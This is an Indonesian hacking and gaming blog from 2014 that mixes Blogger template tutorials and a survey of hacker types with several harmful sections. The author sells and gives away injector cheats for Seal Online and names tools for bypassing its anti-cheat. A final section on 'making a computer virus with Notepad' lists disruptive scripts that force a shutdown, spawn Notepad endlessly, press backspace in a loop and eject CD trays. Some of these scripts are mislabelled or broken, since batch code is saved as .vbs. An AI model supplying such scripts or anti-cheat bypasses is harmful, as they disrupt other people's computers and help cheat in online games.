Defender Black Red Albert Yakuza

Wednesday, 24 September 2014

TRAINER SEAL ONLINE INDONESIA


  Downloads Free
Seal Files!
No Password

( new feature and error fixed )
 
WORK ALL WINDOWS , TERMASUK W.8 !!!!

TINGGAL CENTANG ^^ GA PAKEK REPOT-REPOT

FITUR

STATUS HACK :
MSPD
ASPD
LEVEL
GENDER

HARD HACK :
AUTO POTION
POT NO DELAY
ANTI STUNT
HIT PARTY
MASTER GUILD
LEADER PARTY
PET NO LAPAR
ZOOM HACK
NO MATERIAL
SANTET
SPAM ATTACK
SPAM COMBO
RANGE HACK
ALL SKILL AREA
XG UNLIMITED
AUTO DART

TELEPORT :
NICK CALL
MAP TO
KOR X
KOR Y

FAKE HACK :
FAKE JOB
FAKE FAME
FAKE ITEM
FAKE PLUS
FAKE JUMLAH
FAKE EP
FAKE GAMBAR
DAY COUPLE

STRING HACK :
SLIP PARTY
GM MODE
FAKE NAME
F.DIALOG

MAP / NPC HACK :
MAP VALUE
DC HACK  ( NEW )
NPC BOY        
NPC ICE QUEEN
DINDING BATU
ICE DUDE
KUIL JIKAEL
UNLIMITED AP
ANTI DC
GENDER.C
INVTERVAL SET

 = NPC PENJUAL JOKER

UNDB / UNTSTUCK


Visit us : Albert Yakuza
Jika anda menginginkan jasa joki, atau menanya sesuatu
Contact Me : 087815837266
Jika saya tidak membalas pesan anda, harap bersabar, karena saya tidak memiliki pulsa yg lebih untuk membalas semua pesan anda.

Salam Saya IGN SERVER ELIOS : Soulofguardian


 Download

Virus Scan Online

Sebelum Komentar Lihat Video ini (Bukti Working)

     Yang bilang keylogger, bohongan, nipu dll pikir dulu ya !!


Fitur :

Lihat pada gambar di atas
Cara Pakai : Tutorial ada di Notepad

Untuk Windows 7 Run As Admin, Injector di buka saat loading delphine

Trial Hanya untuk 1 harian (24 Jam)

Bila mau full version nya silahkan Contact Nomor di bawah ini

NO HP : 0878 1583 7266 (Sanusi/Admin Albert Yakuza/Snuz.us) (Bila ada apa-apa silahkan hubungi gw)


Harap Di Baca Sebelum Contact ya :

Kami memberikan kualitas cheat rada menengah dengan harga terjangkau.. untuk system kami seperti ini .
tolong di pahamkan ya..


- gk ada uang refund bila kedeteck/kepacth dalam 1 minggu
tetap saya akan bertanggung jawab bila sudah ada update baru dari saya..Intinya bisa di update pake cheat gratis
- Sytem cheat menggunakan Autolog sehingga bila Mt biasa 90% masih bisa ..system cheat saya pun tidak akan kedeteck selama delphine update dengan system barunya sehingga metode saya Nihil lagi di gunakan..
System kami ada dua..
- AutoLog n Non Auto Log
klau autolog sudah di sebut di atas ya.. gk ada yang refund blbal
- Non AUto log system Bergaransi selama 2 minggu.. bila cheat deteck bayar lagi~
Yang pasti harga Beda juah dengan Non AUto log dan autolog


Bahan :

XueTr
Cheat Engine & WPE Editan

Cara Pakai :

XueTr untuk bypass delphine nya
Cheat Engine dan WPE (Cari tahu sendiri dan kembang kan sendiri menggunakanya ya ^^)

Working At
Windows XP SP2
Windows XP SP3
Windows NT 5.0
Windows Server 2003
Windows 7 32 Bit

Visit us : Albert YakuzaJika anda menginginkan jasa joki, atau menanya sesuatu
Contact Me : 087815837266
Jika saya tidak membalas pesan anda, harap bersabar, karena saya tidak memiliki pulsa yg lebih untuk membalas semua pesan anda.

Salam Saya IGN SERVER ELIOS : Soulofguardian

Tuesday, 23 September 2014

alo! kali ini saya akan membuat trainer, hem trainer apa? nah jika anda tidak tahu trainer apa saya akan jelaskan, begini trainer adalah suatu aplikasi mini yang bekerja untuk menge-cheat tanpa susah-susah, sudah langsung saja membuat trainernya saja :D

Bahan yang diperlukan :
Yang paling penting, Cheat Engine Versi 6.3 [ Klik diini MBsHanya 8 ] ( Sebetulnya versi apa saja boleh )
Game yang akan dibuat trainernya, pada contoh kali ini saya akan membuat trainer CS 1.6 No Steam : Hack Money ( Kalau tidak punya CS-nya, silahkan download disini )

Jika bahan-bahan sudah siap, mari membuat trainer :D
Buka Cheat Engine 6.3 dan CS 1.6 No Steam, Dan Lihat juga tutor bergambar :D


Setelah kita mengeklik tombol tersebut akan keluar kotak dialog, pilih hl.exe


Setelah itu, kita lihat jumlah uang yang ada pada CS 1.6-nya
Normalnya $16000, nah kita scan saja nomor tersebut tanpa tanda " $ "

  Pilih Float atau 4 Bytes

Setelah melakukan klik pada tombol [ First Scan ]
Maka muncul beberapa address yang keluar ( Saya tidak memperlihatkannya )
Lalu buka CS 1.6-nya, kemudian beli [ Kevlar+Helmet dengan harga $1000 ]
Lalu minimize CS 1.6-nya dan ke Cheat Engine
Seperti contoh diatas, tetapi kita ubah Valuenya saja menjadi 15000
Setelah mengisi dengan 15000 Klik tombol [ Next Scan ]
Maka akan keluar 2 address atau beberapa :D
Silahkan anda masukkan satu persatu hingga benar


Setelah mengganti, lihat CS 1.6-nya, jika uang/money anda tidak berubah, terpaksa harus mengulang :(]


Setelah klik sana klik sini :D
Maka keluar kotak dialog seperti dibawah ini :



--------------------

Penting :

1. Untuk menambahkan hotkey dan effect
2. Untuk menghapus hotkey dan effect
3. Untuk mengganti icon trainer yang kita buat
4. Untuk menambahkan gambar pada trainer
5. Tentang trainer yang dibuat
6. Nama trainer-nya
7. Untuk menambahkan suara atau music pada trainer ( Tetapi ingat, hanya yang berformat XM file )

--------------------

Lalu klik tombol [ Add Hotkey ]
Kemudian muncul kotak dialog kecil, klik ok saja :)

Kemudian akan muncul kotak sedang, lihat gambar berikut :


--------------------

Penting :

1. Kotak tenpat untuk menampung hotkey trainer kita
2. Untuk menekan tombol tetentu agar kita bisa menggunakan trainer kita
3. Disana ada banyak pilihan yang bisa kita pakai
3. ( Toggle freeze = Pilihan ini untuk membekukan jumlah uang kita saat bermain )
3. ( Toggle freeze and allow increase = Sama dengan yang diatas, tetapi pilihan ini akan menambahkan valuenya+membekukannya )
3. ( Toggle freeze and allow decrease = Kebalikan dari Toggle freeze anda allow increase )
3. ( Freeze = Pilihan ini memperbolehkan untuk menentukan sendiri jumlah value yang akan diinginkan )
3. ( Unfreeze = Kebalikan dari Freeze )
3. ( Set value to = Untuk menentukan jumlah value yang akan diinginkan )
3. ( Decrease value with = Untuk mengurangi jumlah value yang akan diinginkan )
3. ( Increase value with = Sama seperti Decrease value to, tetapi pilihan ini akan menambahkan jumlah value yang inginkan )

--------------------

Nah selesai sudah posting saya kali ini cukup panjang lebar bukan? tentu saja panjang karena saya menjelaskan, memberi keterangan, memperlihatkan gambar.
Tetapi tidak apa-apa kok! saya tidak lelah sedikit pun :D
Ayo kita lanjutkan! lho katanya sudah selesai postingnya? sudah selesai apa belum?
Hehehe... belum, katanya sudah selesai diatas
HHHEEEMMM... ya ya ya saya lupa, X(
Hehe ayo kita lanjutkan!
Masih belum di tutupkan?
Silahkan anda ikuti contoh dibawah ini :


--------------------

Penting :

1. Bagian kerja anda
2. Discription anda
3. Jumlah yang harus diisi
4. Jenis yang dipakai
5. Hotkey yang harus ditekan
6. Jika semua sudah selesai, tekan tombol [ Generate trainer ]

--------------------

Jika sudah selesai membuat trainernya, silahkan klik tombol diatas ( 6. )
Ketik namanya terserah anda, contoh : Uji trainer.exe


--------------------

Penting :

1. Sesuaikan dengan bit komputer anda
2. Silahkan anda ganti iconnya
3. Jika sudah selesai, klik tombol tersebut

--------------------




 Sekarang anda mempunyai trainer buatan sendiri dan tinggal dicoba
Jika anda ingin memakai trainer buatan saya, silahkan download dibawah ini :


Selamat berkereasi !!!

Dulu saya tidak begitu tertarik untuk merubah warna Background disetiap halaman posting, selain kesannya aneh..mungkin juga terkesan rada Ndeso (kata orang jawa) hehehe Tapi itu dulu ya, selera tentu bisa berubah juga khan, ini tidak lain karena saya lagi senang ngedit template dengan tampilan nyerempet bergaya style Windows 8 ala Metro UI yang lebih berwarna-warni namun tidak sedikitpun menghilangkan kesan elegan pada tampilannya.

Nah dari Style Windows 8 itulah saya mulai tertarik dan mencoba sekaligus ngajarin gimana caranya agar warna postingan blog kalian bisa berubah warna secara otomatis tanpa harus menggunakan banyak koding CSS apalagi  harus menggunakan Conditional Tag yang bikin pusing kepala aja.

Contoh penerapannya bisa kalian lihat pada Blog Gallery Templates milik saya di zoomtemplate.com



Langsung aja ya dan caranya sangat mudah sekali...silahkan cari kode </head> kemudian letakan kode Javascript dibawah ini tepat diatas kode </head>

<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js?ver=1.5' type='text/javascript'/>
<script type='text/javascript'>
//<![CDATA[
function get_random_color() {
var letters = '0123456789ABCDEF'.split('');
var color = '#';
for (var i = 0; i < 6; i++ ) {
color += letters[Math.round(Math.random() * 14)];
}
return color;
}
$(function() {
$(".post").each(function() {
$(this).css("background-color", get_random_color());
});
});
//]]>
</script>

Jika kalian hanya ingin merubah warna posting pada halaman utama saja kalian tinggal gunakan saja conditional tag seperti kode dibawah ini:

<b:if cond='data:blog.url == data:blog.homepageUrl'>
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js?ver=1.5' type='text/javascript'/>
<script type='text/javascript'>
//<![CDATA[
function get_random_color() {
var letters = '0123456789ABCDEF'.split('');
var color = '#';
for (var i = 0; i < 6; i++ ) {
color += letters[Math.round(Math.random() * 14)];
}
return color;
}
$(function() {
$(".post").each(function() {
$(this).css("background-color", get_random_color());
});
});
//]]>
</script>
</b:if> 

Menurut saya tampilan warna berbeda pada latar setiap posting mungkin lebih cocok hanya untuk Template dengan Style Gallery, kalau untuk Template biasa mungkin terlihat gimana gitu... namun tidak ada salahnya juga kalau ingin mencobanya. Bila kalian lebih jeli dan memiliki kemampuan Programming Javascript yang handal tentu bisa mengeditnya lebih bagus lagi sesuai kebutuhan.

Oh iya jangan tanyakan lagi ya seperti "bikin berat loading ya om?" namanya juga ada penambahan koding, terlebih lagi javascript tentu saja nambah size halamanan..tapi itu bukan berarti bikin berat loading khan :)

Cara Cloning Template - Blog Gilang Prf - Berawal dari saya mencari di mbah google template Blogger Valid HTML5 + Responsive untuk mengganti template default bawaan dari blogger untuk Blog Sederhana saya ini, namun semuanya tidak sesuai dengan selera/keinginan saya hehehe :D Dalam pencarian Template Valid HTML5, saya di arahkan mbah google ke blog master om Agus Ramadhani dan Kang Ismet

Saya suka Tema Template kedua master Blog ini. Nah di sini muncul ide kreatif saya untuk meng-cloning template master blog ini. (Maaf ya om Agus dan Kang Ismet) hehehe Piss \m/_.._\m/ saya hanya sekedar mengembangkan kreatifitas saya, dan tidak akan share hasil Template cloningan buatan saya :).

Pertama kali saya cloning template Kang Ismet dan berhasil. Berikut screenshoot nya :


Waktu Pembuatan template clonengan hanya membutuhkan waktu dua jam, termasuk menyusun formulasi template, dan menemukan kode kode yang disembunyikan atau yang tidak ditampilkan, sampai proses upload template di blogger. Dalam pembuatan template, anda tidak perlu repot-repot mencari template yang mirip mirip template bawaan template orang yang anda akan di cloning. cukup copy source code templatenya saja.

Disini saya tidak akan share hasil Template clonengan blog master buatan saya, namun saya akan memberitahukan cara cloning template blog orang lain. Okay !! mari kita langsung aja caranya (simak baik-baik) :

Dalam Bahasan postingan ini, saya kasih contoh cloning template blog saya sendiri, hasil clonengan dari template Blog om master blog Agus Ramadhani atau biasa dikenal di sebut o-om.com

Pertama
Hal pertama yang anda lakukan pilih salah satu postingan template target anda, terserah anda postingan apa aja!!. Setelah memilih salah satu postingan, lalu klik kanan di area bebas. Klik Kanan > Lihat Code Sumber Laman. Jika browser di kommputer anda berbahasa inggris kira-kira seperti ini: Right Click > See Source Code. (saya menggunakan Browser Firefox Berbahasa Indonesia). Lalu buat Notepad, dan copy semua Source code halaman postingan pilihan anda, Paste lalu beri Judul notepad anda "dplkt-halaman-postingan.txt" (tanpa tanda kutip). atau "dplkt-halaman-postingan.xml" (tanpa tanda kutip). Jangan Lupa Buat Folder Baru dan Beri judul "Duplikat Template" (Tanpa Tanda Kutip). Simpan Hasil Copian Sorce Code anda di folder tersebut, biar gampang di ingat.

Kedua
Perlu di ketahui, susunan Template Blog umumnya seperti ini :


Header Wrapper terdiri dari Header Left dan Header Right. (pada Template duplikat saya, seperti ini Header Inner dan .blog-desc)
Outer Wrapper terdiri dari Main Wrapper dan Sidebar Wrapper.
Footer Wrapper terdiri dari Bottom Left, Bottom Center dan Bottom Right
Credit Wrapper.

Okay!! anda mulai dari bawah code HTML dulu, hasil dari copian sorce code tadi. Cari dan perhatikan baik-baik code pada bagian Footer Wrapper, misalnya seperti ini: <div id='footer-wrapper'>

Susunan code bagian Footer Wrapper dari template duplikat saya, terdiri dari :

<div id='footer-wrapper'> <div id='bottom'> ..... susunan dari Bottom terdiri dari : - left-bottom - center-bottom - right-bottom <div id='upper-footer'> dan <div class='credits'>

Contoh code pada bagian Footer Wrapper:

<div id='footer-wrapper'> <div id='bottom'> <div class='bottom section section' id='left-bottom'><div class='widget HTML' id='HTML4'> <h2 class='title'>About Me</h2> <div class='widget-content'> <div class="profile-textblock"> <!-- isi widget ABOUT ME saya hapus --> </div> </div> </div></div> 

Note:
Perhatikan code yang berwarna merah. yang berwarna merah, Hapus saja.
Perhatikan code yang berwarna Hijau, code div ganti dengan b:section lalu tambahkan preferred='yes' di belakang code id='left-bottom', sehingga hasilnya seperti ini :

<b:section class='bottom section' id='left-bottom' preferred='yes'/>

Lalu lanjut pada bagian center-bottom dan right-bottom. dan hasil lengkap dari b:section widget pada sub bagian bottom seperti ini :

<b:section class='bottom section' id='left-bottom' preferred='yes'/> <b:section class='bottom section' id='center-bottom' preferred='yes'/> <b:section class='bottom section' id='right-bottom' preferred='yes'/>

Hasil Selengkapnya pada sub bagian Bottom dari Footer Wrapper seperti ini :

 <div id='footer-wrapper'> <div id='bottom'> <b:section class='bottom section' id='left-bottom' preferred='yes'/> <b:section class='bottom section' id='center-bottom' preferred='yes'/> <b:section class='bottom section' id='right-bottom' preferred='yes'/> <div id='upper-footer'> <b:section class='footer section' id='footer' preferred='yes'/> </div> <!-- end upper footer --> </div> <!-- end bottom --> <div class='credits'> </div> <!-- end credits --> </div> <!-- end footer wrapper -->

Note:
Perhatikan dan teliti baik-baik code </div> sebagai code penutup. Jangan sampai ada yang salah dalam penempatan code </div> tersebut.

Ketiga
Lanjut pada bagian Outer Wrapper yang terdiri dari Main Wrapper dan Sidebar Wrapper.

Contoh susunan bagian Outer Wrapper :

<div id='main-wrapper'> <div id='main-wrapper-border'> <-- ini sekedar tambahan style border saja, sebelah kanan body postingan tebalnya 5px <div id='sidebar-wrapper'>

Pada bagian Outer Wrapper ini, sama seperti cara menyusun bagian Footer Wrapper, namun khusus pada bagian b:section Main, anda sisa meng-copy saja code template yang lama milik anda. Contohnya seperti ini :

<div id='outer-wrapper'> <div id='main-wrapper'> <div id='main-wrapper-border'> <b:section class='main' id='main' showaddelement='no'> <---(star copy) mulai copy semua code b:section Main, dari template blog anda yang lama sampai.... <b:widget id='Blog1' locked='true' title='Posting Blog' type='Blog'> <b:includable id='main' var='top'> . . . <!-- bla bla bla bla bla --> . . . </b:includable> </b:widget> </b:section> <-- sampai dengan akhir dari code ini </div> <!-- end main wrapper border --> </div> <!-- end main wrapper -->

Note:
Yang berwarna biru mulai star peng-copian dari template blog lama anda sampai akhir dari </b:section>.
Khusus code </div> penutup untuk Outer Wrapper belum ditambahkan dari keterangan diatas, karena masih ada Sidebar Wrapper. Nantinya code </div> penutup untuk Outer Wrapper akan di sematkan tepat dibawah Sidebar Wrapper.
Dalam kasus ini, saya meng-copy isi code Main Wrapper dari template default bawaan blogger. mengingat masih lengkap, masih perawan, Karena belum ada pengurangan atau pengeditan yang saya lakukan dari template default bawaan blogger tersebut. (isi dari code Blog Post dan isi code Comments).

Selanjutnya, anda lanjut pada sub bagian Sidebar Wrapper. Lihat contoh di bawah ini :

<div id='sidebar-wrapper'> <div class='inner-box section section' id='inner-box'><div class='widget Feed' id='Feed1'> <h2>New Post</h2> <div class='widget-content' id='Feed1_feedItemListDisplay'> <span style='filter: alpha(25); opacity: 0.25;'> <a href='http://metropersonal.blogspot.com/feeds/posts/default'>Memuat...</a> </span> </div> </div>

Note:
Perhatikan code yang berwarna merah. yang berwarna merah, Hapus saja.
Perhatikan code yang berwarna Hijau, code div ganti dengan b:section lalu tambahkan preferred='yes' di belakang code id='inner-box', sehingga hasilnya seperti ini :

<b:section class='inner-box section' id='inner-box' preferred='yes'/>

Hasil Selengkapnya pada sub bagian Sidebar Wrapper dari Outer Wrapper seperti ini :

<div id='sidebar-wrapper'> <b:section class='inner-box section' id='inner-box' preferred='yes'/> </div> <!-- end sidebar wrapper --> 

Dan sebagai penutup bahasan bagian Outer Wrapper, berikut Hasil Selngkap-lengkapnya :


 <div id='outer-wrapper'> <div id='main-wrapper'> <div id='main-wrapper-border'> <b:section class='main' id='main' showaddelement='no'> <---(star copy) mulai copy semua code b:section Main, dari template blog anda yang lama sampai.... <b:widget id='Blog1' locked='true' title='Posting Blog' type='Blog'> <b:includable id='main' var='top'> . . . <!-- bla bla bla bla bla --> . . . </b:includable> </b:widget> </b:section> <-- sampai dengan akhir dari code ini </div> <!-- end main wrapper border --> </div> <!-- end main wrapper --> <div id='sidebar-wrapper'> <b:section class='inner-box section' id='inner-box' preferred='yes'/> </div> <!-- end sidebar wrapper --> <!-- spacer for skins that want sidebar and main to be the same height--> <div class='clear'>&#160;</div> <!-- clear fix do not remove --> <br/> </div> <!-- end outer-wrapper --> </div> <!-- end outer wrapper line --> <div class='clear'/> <div class='backtotop'><a href='#'>Back to Top</a></div>

Note:
Perhatikan dan teliti baik-baik code </div> sebagai code penutup. Jangan sampai ada yang salah dalam penempatan code </div> penutup tersebut.
Khusus untuk code penutup </div> <!-- end outer wrapper line --> ini, fungsinya sebagai code </div> penutup dari data vocabulary Review, gunanya untuk merating semua postingan anda, letak tepatnya, anda bisa lihat tepat dibawah code <body>

Keempat
Selanjutnya, anda lanjut pada bagian Header Wrapper, sebagai akhir dari pembahasan code ini. Berikut Susunan code dari Header Wrapper :

<div id='branding'> <div id='head-inner'> <div id='header-wrapper'>

Header Wrapper terdiri dari Blog Desc dan Header. Pada bagian Header Wrapper ini, sama seperti cara menyusun bagian Outer Wrapper, namun khusus pada bagian b:section Header, anda sisa meng-copy saja code template yang lama milik anda. Contohnya seperti ini :

<div id='branding'> <div id='head-inner'> <div id='header-wrapper'> <b:section class='blog-desc section' id='blog-desc' preferred='yes' showaddelement='yes'/> <b:section class='header' id='header' maxwidgets='1' showaddelement='no'> <---(star copy) mulai copy semua code b:section Header, dari template blog anda yang lama sampai.... <b:widget id='Header1' locked='true' title='Metro Personal (Header)' type='Header'> <b:includable id='main'> <b:if cond='data:useImage'> <b:if cond='data:imagePlacement == &quot;BEHIND&quot;'> . . . <!-- bla bla bla bla bla --> . . . </b:includable> </b:widget> </b:section> <-- sampai dengan akhir dari code ini </div> <!-- end header wrapper --> </div> <!-- end head inner --> </div> <!-- end branding -->

Note:
Pada bagian blog-desc section, saya tambahkan showaddelement='yes' yang nantinya anda akan ganti menjadi 'no' setelah anda mengisi deskripsi tambahan agar supaya tidak ada penambahan widget lagi. Khusus deskripsi tambahan saja.
Yang berwarna biru mulai star peng-copian dari template blog lama anda sampai akhir dari </b:section>.
Perhatikan dan teliti baik-baik code </div> sebagai code penutup. Jangan sampai ada yang salah dalam penempatan code </div> penutup tersebut.

Kelima (penutup)
Rangkuman hasil Duplikat Template dari semua pembahasan code HTML diatas sebagai berikut :

<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html> <HTML> <head> <meta charset='utf-8'/> <!-- Sisipkan Code META TAG disini --> ////////////////////////////////////////////// <!-- Sisipkan Code CSS disini --> ]]></b:skin> <!-- Sisipkan Code Javascript RELATED POST disini --> <!-- Sisipkan Code Javascript AUTO READ MORE disini --> <!-- Sisipkan Code Javascript MOBILE MENU disini --> </head> <body> <div><div itemscope='' itemtype='http://data-vocabulary.org/Review'> <div id='branding'> <!-- Sisipkan Code Social Facebook dll disini --> <!-- Sisipkan Code Search disini --> <div id='head-inner'> <div id='header-wrapper'> <b:section class='blog-desc section' id='blog-desc' preferred='yes' showaddelement='yes'/> <b:section class='header' id='header' maxwidgets='1' showaddelement='no'> <---(star copy) mulai copy semua code b:section Header, dari template blog anda yang lama sampai.... <b:widget id='Header1' locked='true' title='Metro Personal (Header)' type='Header'> <b:includable id='main'> <b:if cond='data:useImage'> <b:if cond='data:imagePlacement == &quot;BEHIND&quot;'> . . . <!-- bla bla bla bla bla --> . . . </b:includable> </b:widget> </b:section> <-- sampai dengan akhir dari code ini. </div> <!-- end header wrapper --> </div> <!-- end head inner --> </div> <!-- end branding --> ////////////////////////////////////////////// <!-- Sisipkan Code Stripe Style disini --> <div id='outer-wrapper'> <!-- Sisipkan Code Javascript MOBILE MENU disini --> <!-- Sisipkan Code Menu Navigasi disini --> <div id='main-wrapper'> <div id='main-wrapper-border'> <b:section class='main' id='main' showaddelement='no'> <---(star copy) mulai copy semua code b:section Main, dari template blog anda yang lama sampai.... <b:widget id='Blog1' locked='true' title='Posting Blog' type='Blog'> <b:includable id='main' var='top'> . . . <!-- bla bla bla bla bla --> . . . </b:includable> </b:widget> </b:section> <-- sampai dengan akhir dari code ini </div> <!-- end main wrapper border --> </div> <!-- end main wrapper -->  <div id='sidebar-wrapper'> <b:section class='inner-box section' id='inner-box' preferred='yes'/> </div> <!-- end sidebar wrapper -->  <!-- spacer for skins that want sidebar and main to be the same height--> <div class='clear'>&#160;</div> <!-- clear fix do not remove --> <br/> </div> <!-- end outer-wrapper --> </div> <!-- end outer wrapper line -->  <div class='clear'/> <div class='backtotop'><a href='#'>Back to Top</a></div> ////////////////////////////////////////////// <div id='footer-wrapper'> <div id='bottom'> <b:section class='bottom section' id='left-bottom' preferred='yes'/> <b:section class='bottom section' id='center-bottom' preferred='yes'/> <b:section class='bottom section' id='right-bottom' preferred='yes'/> <div id='upper-footer'> <b:section class='footer section' id='footer' preferred='yes'/> </div> <!-- end upper footer --> </div> <!-- end bottom --> <div class='credits'> </div> <!-- end credits --> </div> <!-- end footer wrapper -->  </div> </body> </HTML>

Note:
Untuk code Meta Tag silahkan kunjungi Blog Kedua Master yang saya sebutkan disamping, disini dan disini

Bila ada yang kurang jelas silahkan tanyakan melalui kotak komentar dibawah. Selamat Mencoba!!
Keep Spirit and Keep Imagination...Enjoy!! :) 

Kali Ini Blog Albert Yakuza akan memberikan cheat untuk member Albert Yakuza
Cheat ini Berupa Injector dan D3D Menu Seal Online Indonesia 2014
Kepada Member Albert Yakuza, dilarang Memperjual Belikan Cheat ini
Cheat Seal Online Complete  Juni - Juli 2014 work
Cheat ini Work Dari Agustus sampai September
Cheat Seal ini Sangat Mudah

Langsung saja di baca ampe abis :


Downloads Free
 Password
Landasan-Ulin.tk

Tutorial !
-Buka dhack.rar dengan run as admin bagi Windows 7 / 8
1. Kedua File Harus 1 Folder
2. Pilih Hard Inject, Jika Gagal Gunakan Normal Inject
3. Jalankan SEAL Seperti biasa


Atau Bisa Menggunakan Injector Anda...

Beberapa cheat tidak kompatible dengan OS, jadi saya buat beberapa cheat. Silahkan dicoba mana yang cocok dengan PC/Laptop anda.
Sudah saya coba di PC dan Laptop dengan OS berbeda, dan hasilnya WORK !!!

Visit us : Albert Yakuza
Jika anda menginginkan jasa joki, atau menanya sesuatu
Contact Me : 087815837266
Jika saya tidak membalas pesan anda, harap bersabar, karena saya tidak memiliki pulsa yg lebih untuk membalas semua pesan anda.

Salam Saya IGN SERVER ELIOS : Soulofguardian

Saturday, 20 September 2014

Mengenal Jenis Dan Tehnik Serangan Hacker - Sebagai pengguna internet aktif tentunya lo tau kan banyak berita yang sedang hangat dibicarakan di forum-forum ternama tentang kasus-kasus yang yang dibebankan kepada hacker ini dan gue ingin memberi informasi sedikit tentang jenis dari method yang sering dilakukan oleh hacker.
Ilustrasi Gambar diambil dari google
Akhir-akhir ini banyak banget hacker yang diciduk ke kantor polisi seperti hal nya Carding-man yang banyak ditangkap karena transaksi gelap dan membeli barang dengan akun orang lain dan terkada mereka ditangkap saat mencairkan uang hasil usaha yang ah sudahlah . Dan silahkan simak Jenis dan Tehnik Serangan Hacker Berikut 
Cyber Criminal
Ilustrasi Gambar diambil dari google

Adalah Hacker yang terdiri dari sekelompok besar Hacker jahat yang memakai malware untuk mencuri uang korbannya. Mereka biasa menyusupkan Malware tersebut melalui program aplikasi crack seperti IDM Crack atau yang lain. Cara kerja mereka adalah dengan melakukan pencurian password, akun bank dan pembobolan bank.

Spammer dan Penyebar Adware
Ilustrasi Gambar diambil dari google

Hacker jenis ini selalu menyebarkan spam dan iklan illegal yang berfungsi untuk menjala uang. Hacker jenis ini di desas-desuskan dibayar oleh perusahaan tertentu untuk menjual produknya. Tetapi tidak jarang Hacker jenis ini berdiri sendiri untuk menjual produk sendiri.

Hacktivist
Ilustrasi Gambar diambil dari google

Hacktivist menurut saya adalah jenis hacker yang paling berbahaya, karena hacker ini dalam melakukan aksinya berlandaskan politik, agama, keadaan social, usia hingga keyakinan. Hacker jenis ini tidak segan-segan mengobrak abrik situs milik lawannya, membuat server down bahkan membuat computer milik korbannya rusak! Tipe ini terkadang disalah kaprahkan dan sering disebut Anonymous padahal Anonymous itu adalah Aktivis yang merahasia kan indentitas tapi sekarang sudah cukup banyak yang membuka identitasnya.


Mata-mata Perusahaan
Ilustrasi Gambar diambil dari google

Sesuai namanya, Hacker yang satu ini ter-organisir dalam sebuah perusahaan untuk mematai-matai perusahaan milik lawannya. Yang biasa di mata-matai oleh hacker ini adalah keadaan financial perusahaan lawannya, produk baru lawannya, hingga karyawan perusahaan.

Advanced Persistent Threat (APT) Agent
Ilustrasi Gambar diambil dari google

Hacker jenis ini wilayah kerjanya terorgansir, terdiri dari grup-grup besar yang didanai oleh pihak ‘berduit’ untuk melakukan kejahatan di Internet. Hacker ini memiliki tujuan jangka panjang, biasanya hacker ini melakukan kejahatan seperti mencuri property intelektual sebuah perusahaan. Mereka menjiplak ide perusahaan lain untuk direalisasikan di wilayah mereka, atau menjual informasi tersebut ke penawar tertinggi. Jual Beli informasi ini bukanlah di situs-situs jual beli resmi, tetapi di pasar gelap.

Rogue Hacker
Ilustrasi Gambar diambil dari google

Hacker yang satu ini dapat dikatakan hacker yang aman, karena meraka tidak melakukan obrak-abrik Internet atau bisnis orang lain. Mereka hanya pamer kemampuan pada lawan mereka atau sedang tertantang untuk melakukan tindakan illegal. Rogue Hacker akan menyudahi aksinya jika lawannya sudah mengakui kehebatannya, situs yang siobrak-abrik biasanya situs lawannya. Rogue Hacker yang nekat bias mengobrak-abrik situs orang lain sebagai ajang pamer diri tetapi ini jarang terjadi.

Cyber Warriors
Ilustrasi Gambar diambil dari google

Dari namanya dapat  disimpulkan perang! Ya, ini adalah perang para Hacker melawan Hacker dari wilayah lain, grup lain bahkan Negara lain. Cyber Warriors sering terjadi di dunia Internet, salah satunya adalah perang Hacker Indonesia Vs Malaysia dengan mengobrak-abrik situs pemerintah untuk di permalukan kepada dunia. Tetapi biasanya tujuan akhir dari Cyber Warriors adalah untuk melumpuhklan kekuatan militer lawan.


Sekian artikel Mengenal Jenis Dan Tehnik Serangan Hacker semoga bisa menambah wawasan lo dan jika berkenan silahkan tinggalkan komentar dibawah dan ini adalah artikel dari blog lama yang bermigrasi ke blog baru ini terima kasih.

Jika Ingin Copy-Paste Artikel Hubungi > Albert Yakuza |Jika Ditemukan Pencurian Konten Tanpa Izin , Saya Akan Melakukan DMCA Complaint Atas Artikel Yang Anda Curi

Cara Membuat Virus Komputer Dasar Dengan Notepad - Virus Virus Komputer biasanya bekerja menggandakan diri merusak data dengan mengubah extensi dari data asli , sangat mengagumkan bukan, dan tentunya virus akan memaksa komputer lo bekerja lebih dan akhirnya menyebabkan komputer lo overprocces performance menjadi 100%.

Dan virus akan merusak sistem perangkat lunak secara perlahan atau mungkin cepat dan jangan dikira tidak untuk perangkat keras jika komputer lo melakukan overprocess menyebabkan semua data dijalankan bersamaan dan itu bisa membuat kipas van laptop lu cepat hangus dan termal terbakar semua nya jika dihitung rupiah bernial 700ribuan hanya untuk kipas.

Cara Membuat Virus Komputer Dasar Dengan Notepad
1. Virus Untuk Membuat Komputer Shutdown
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
msg * I'AM WATCHING YOU!
shutdown -c "Error Your PC is Load,.,.," -s\
[+] Lalu Save As beri nama homo1.vbs dan jangan lupa pilih jenis File (All Files)

2. Virus Untuk Membuat Komputer Shutdown Dengan Timer
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo shutdown -s -t 2 -f
[+] Angka 2 adalah timernya silahkan ganti sesuka lu bray
[+] Lalu Save As beri nama homo2.vbs dan jangan lupa pilih jenis File (All Files)

3. Virus Untuk Membuat Tombol Backspace Menekan Terus-Menerus  "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
MsgBox "Balik Lagi Bos!"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
[+] Lalu Save As beri nama homo3.vbs dan jangan lupa pilih jenis File (All Files)

4. Virus Untuk Membuat Notepad Terbuka Secara Otomatis  "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
[+] Lalu Save As beri nama homo4.vbs dan jangan lupa pilih jenis File (All Files)

5. Virus Untuk Membuat DVD/CD ROOM terbuka sendiri "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
